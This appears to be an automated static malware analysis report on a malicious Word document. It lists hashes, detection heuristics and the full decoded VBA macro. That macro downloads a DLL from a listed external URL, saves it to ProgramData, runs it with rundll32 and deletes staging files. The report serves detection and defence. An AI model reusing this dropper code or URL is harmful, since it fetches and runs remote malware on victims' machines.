Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 7a6a225655a7c60a…

MALICIOUS

Office (OLE) / .DOC

31.0 KB Created: 2026-06-15 03:32:00 Authoring application: Microsoft Office Word First seen: 2026-06-18
MD5: 6e8878aea8d2321412522eb380daaadc SHA-1: 084368fe3df1baf20848aee8b87e835ab8bba187 SHA-256: 7a6a225655a7c60a5c065628a81b934c634fbbab634d12e2c53363679e2f291b
Risk Score: 282

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Set wshShell = CreateObject("WScript.Shell")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            wshShell.Run "rundll32 " & filePath & ", DllRegisterServer"
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            adoStream.Write xmlHTTP.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xmlHTTP = CreateObject("MSXML2.XMLHTTP")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://7qfmzuglr45xs.com/nra962sc0/ft2dol9oy.php?l=cav2.cab Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1486 bytes
SHA-256: b856f83d3941382a720139e52b3303ea999744b8240a0053f7e6e501ff5b8d6d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub DownloadAndRunDLL()
    Dim url As String
    Dim filePath As String
    Dim xmlHTTP As Object
    Dim adoStream As Object
    Dim wshShell As Object
    Dim fso As Object

    url = "http://7qfmzuglr45xs.com/nra962sc0/ft2dol9oy.php?l=cav2.cab"
    filePath = "C:\ProgramData\a9xyi.dll"

    On Error Resume Next

    Set xmlHTTP = CreateObject("MSXML2.XMLHTTP")
    xmlHTTP.Open "GET", url, False
    xmlHTTP.Send

    If xmlHTTP.Status = 200 Then
        Set adoStream = CreateObject("ADODB.Stream")
        adoStream.Open
        adoStream.Type = 1 ' adTypeBinary
        adoStream.Write xmlHTTP.ResponseBody
        adoStream.SaveToFile filePath, 2 ' adSaveCreateOverWrite
        adoStream.Close
        
        Set wshShell = CreateObject("WScript.Shell")
        wshShell.Run "rundll32 " & filePath & ", DllRegisterServer"
        
        Set fso = CreateObject("Scripting.FileSystemObject")
        fso.DeleteFile "C:\ProgramData\aZwhHn.inf"
        fso.DeleteFile "C:\ProgramData\aTdcXq.sct"
    End If

    Set xmlHTTP = Nothing
    Set adoStream = Nothing
    Set wshShell = Nothing
    Set fso = Nothing
End Sub